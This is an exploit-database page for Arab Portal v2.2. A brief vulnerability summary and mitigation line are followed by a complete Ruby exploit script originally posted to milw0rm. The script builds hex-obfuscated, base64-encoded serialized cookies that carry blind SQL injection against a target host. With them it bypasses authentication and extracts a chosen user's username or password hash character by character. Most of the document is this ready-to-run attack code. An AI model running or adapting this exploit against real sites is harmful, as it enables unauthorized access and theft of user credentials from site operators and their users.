Arab Portal v2.2 Exploit

vendor:

Arab Portal v2.2

by:

Jafer Al-Zidjali

8,8

CVSS

HIGH

Blind SQL Injection / Authentication Bypass

CWE

Product Name: Arab Portal v2.2

Affected Version From: Arab Portal v2.2

Affected Version To: Arab Portal v2.2

Patch Exists: YES

Related CWE: N/A

CPE: a:arab_portal:arab_portal_v2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

This exploit allows an attacker to bypass authentication and gain access to the Arab Portal v2.2 application. It is done by exploiting a blind SQL injection vulnerability in the application. The attacker can also gather information from the database such as database name, user, password, table prefix, table names, column names, and data.

Mitigation:

The application should be tested for SQL injection vulnerabilities and any such vulnerabilities should be patched. Input validation should also be implemented to prevent malicious input from being accepted.

Source

Exploit-DB raw data:

#!/usr/bin/ruby

#=============================================#
#          Arab Portal v2.2 Exploit           #,
# Blind SQL Injection / Authentication Bypass #
#  Discovered & written by: Jafer Al-Zidjali  #
#         Email: jafer@scorpionds.com         #
#         Website: www.scorpionds.com         #
#=============================================#

require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          Arab Portal v2.2 Exploit           +",
          "+ Blind SQL Injection / Authentication Bypass +",
          "+  Discovered & written by: Jafer Al-Zidjali  +",
          "+         Email: jafer@scorpionds.com         +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
  w="|"
  text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|" 
        print "\b"+c +w
        w="/"
      elsif w=="/" 
        print "\b"+c +w
        w="-"  
      elsif w=="-" 
        print "\b"+c +w
        w="\\" 
      else
      print "\b"+c +w
      w="|"
      end
      sleep 0.05
    end
    print "\b "
    puts ""
  end
end

print_intro intro

puts "\nEnter host name (e.g. example.com):"
host=gets.chomp

puts "\nEnter script path (e.g. /arabportal/):"
path=gets.chomp

puts "\nEnter userid:"
userid=gets.chomp

puts "\nGetting cookie value..."

http = Net::HTTP.new(host, 80)

resp= http.get(path)
cookie = resp.response["set-cookie"]

len=cookie.split("; ").length
max=0
login_info=""

len.times do |count|
  clen=cookie.split("; ")[count].length
    if clen > max then 
      max=clen 
      login_info=cookie.split("; ")[count]
    end
end

login_info=login_info.split(", ")

if login_info[0].length > login_info[1].length
login_info=login_info[0]
else
login_info=login_info[1]
end

login_info=login_info.split("=")[0]

puts "Cookie name is: "+login_info

puts "\nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."

opt=gets.chomp

if opt=="1"
  unamelen=0
  print "\nGetting username length"

  20.times do |x|
    stmt="#{userid}"+
                    "\x27\x20\x61\x6e\x64\x20\x6c"+
                    "\x65\x6e\x67\x74\x68\x28\x75"+
                    "\x73\x65\x72\x6e\x61\x6d\x65"+
                    "\x29\x3d#{x}\x20\x6f\x72\x20\x27\x27\x3d\x27"

    shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
              "\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
              "\x72\x61\x62\x70\x6f\x72\x74\x61"+
              "\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
              "\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
              stmt.length.to_s+
              "\x3a\x22"+
              stmt+
              "\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
              "\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
              "\x31\x3a\x22\x61\x22\x3b\x7d"

    header={
                  "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
    }

    resp= http.get(path,header)
    if resp.body =~ /action=logout/
      puts "\nLength is: #{x}"
      unamelen=x
      break
    else
        print "."
        STDOUT.flush
    end
  end 

  chars="abcdefghijklmnopqrstuvwxyz0123456789"

  print "\nGetting username: "
  unamelen.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "\x27\x20\x61\x6e\x64\x20\x73"+
                        "\x75\x62\x73\x74\x72\x69\x6e"+
                        "\x67\x28\x75\x73\x65\x72\x6e"+
                        "\x61\x6d\x65\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x20\x6f\x72\x20\x27\x27\x3d\x27"

        shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
                  "\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
                  "\x72\x61\x62\x70\x6f\x72\x74\x61"+
                  "\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
                  "\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
                  stmt.length.to_s+
                  "\x3a\x22"+
                  stmt+
                  "\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
                  "\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
                  "\x31\x3a\x22\x61\x22\x3b\x7d"

        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/
          break
        end
        print "\b"
    end
  end
  puts "\nHave fun :)"

elsif opt=="2"
  chars="0123456789abcdef"

  print "\nGetting password hash: "
  32.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "\x27\x20\x61\x6e\x64\x20\x73\x75"+
                        "\x62\x73\x74\x72\x69\x6e\x67\x28"+
                        "\x70\x61\x73\x73\x77\x6f\x72\x64"+
                        "\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+
                        "\x20\x6f\x72\x20\x27\x27\x3d\x27" 
        shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
                  "\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
                  "\x72\x61\x62\x70\x6f\x72\x74\x61"+
                  "\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
                  "\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
                  stmt.length.to_s+
                  "\x3a\x22"+
                  stmt+
                  "\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
                  "\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
                  "\x31\x3a\x22\x61\x22\x3b\x7d"
        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/	
          break
        end
        print "\b"
    end
  end
  puts "\nHave fun :)"
end

# milw0rm.com [2009-08-07]